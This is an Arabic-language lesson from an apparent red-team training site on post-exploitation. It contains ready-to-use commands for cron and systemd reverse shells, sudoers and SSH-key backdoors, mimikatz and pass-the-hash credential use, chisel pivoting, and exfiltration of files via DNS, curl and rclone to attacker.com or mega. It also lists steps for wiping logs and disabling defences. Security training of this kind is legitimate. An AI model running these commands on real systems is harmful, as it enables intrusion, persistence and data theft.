Cyber Operations Academy logo
أكاديمية العمليات السيبرانية
Red / Blue / Ops
الرئيسية/الدروس/L07
الفرق الحمراء — الهجومخبير75mL07

ما بعد الاستغلال والتحرك الجانبي

الاستمرارية، التحرك الجانبي، وسحب البيانات

#Persistence#Pivoting#C2#Exfiltration

بعد الاختراق: ماذا الآن؟

تشبيه — شرح مبسط
دخلت البيت. لكن المهاجم المحترف لا يأخذ ما يجده فوراً ثم يهرب. أولاً: يصنع نسخة من المفتاح (persistence). ثانياً: يطفئ كاميرات المراقبة (defense evasion). ثالثاً: يدرس باقي الغرف (lateral movement). رابعاً: يأخذ ما يريد بهدوء (exfiltration).

Persistence — البقاء في النظام

على Linux

bash
# Cron
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/A/443 0>&1'" >> /etc/crontab

# systemd
cat > /etc/systemd/system/upd.service <<EOF
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/A/443 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable --now upd

# sudoers backdoor
echo 'attacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers.d/99-upd

# SSH
echo "ssh-rsa AAAA... attacker" >> /root/.ssh/authorized_keys

على Windows

  • Scheduled Task + Run keys في الـ Registry.
  • WMI Event Subscription (يصعب اكتشافه).
  • DLL Hijacking + COM Hijacking.
  • على AD: Golden Ticket / Silver Ticket / DSRM password.

Lateral Movement — التحرك الجانبي

bash
nxc smb 10.10.0.0/24
mimikatz # sekurlsa::logonpasswords
crackmapexec smb 10.0.0.0/24 -u admin -H NTLM_HASH

# Pass-the-Hash
nxc smb 10.0.0.5 -u admin -H 31d6cfe0d16ae931...
# Pass-the-Ticket
Rubeus.exe asktgt /user:admin /rc4:NTLM /ptt

# Pivoting
chisel server -p 8080 --reverse
chisel client A:8080 R:1080:socks
proxychains nmap -sT 10.10.20.0/24

تقنيات تنفيذ عن بعد

  • PsExec / smbexec / wmiexec / atexec (Impacket).
  • WinRM (evil-winrm).
  • DCOM / RDP / SCCM.

Command & Control (C2)

القناة بين المهاجم و الجهاز المخترق. الأدوات الشائعة:

Cobalt Strike
معيار صناعي للـ red teaming (تجاري).
Sliver
مفتوح المصدر، حديث، يدعم mTLS / DNS / HTTP / WireGuard.
Mythic
إطار عمل C2 متعدد الـ agents.
Havoc / Brute Ratel
بدائل حديثة لـ Cobalt Strike.
إخفاء قناة C2
  • domain fronting عبر CDN.
  • DNS tunneling (dnscat2, iodine).
  • قنوات على Slack / Discord / Telegram APIs.
  • تشفير الحمولة بـ malleable C2 profiles.

Exfiltration — تهريب البيانات

exfil
# DNS
for chunk in $(split -b 200 secret.txt); do dig $(base64 $chunk).attacker.com; done
# HTTPS
curl -s -X POST https://attacker.com/u -d @secret.tar.gz
# عبر cloud شرعي
rclone copy secret.tar.gz mega:/backup/

Anti-Forensics (للوعي الدفاعي فقط)

  • مسح ~/.bash_history و /var/log/wtmp.
  • timestomp — تعديل الـ timestamps.
  • تعطيل auditd / Sysmon / Defender.
  • حذف الـ Event Logs في Windows.
مضاد للمسح
أرسل السجلات لخادم SIEM فوراً (forwarder) فلا يستطيع المهاجم محوها محلياً. فعّل immutable backups + log integrity (AIDE / Wazuh FIM).
السابق
هجمات الحوسبة السحابية (AWS / Azure / GCP)
التالي
تحصين الأنظمة والدفاع المتعمق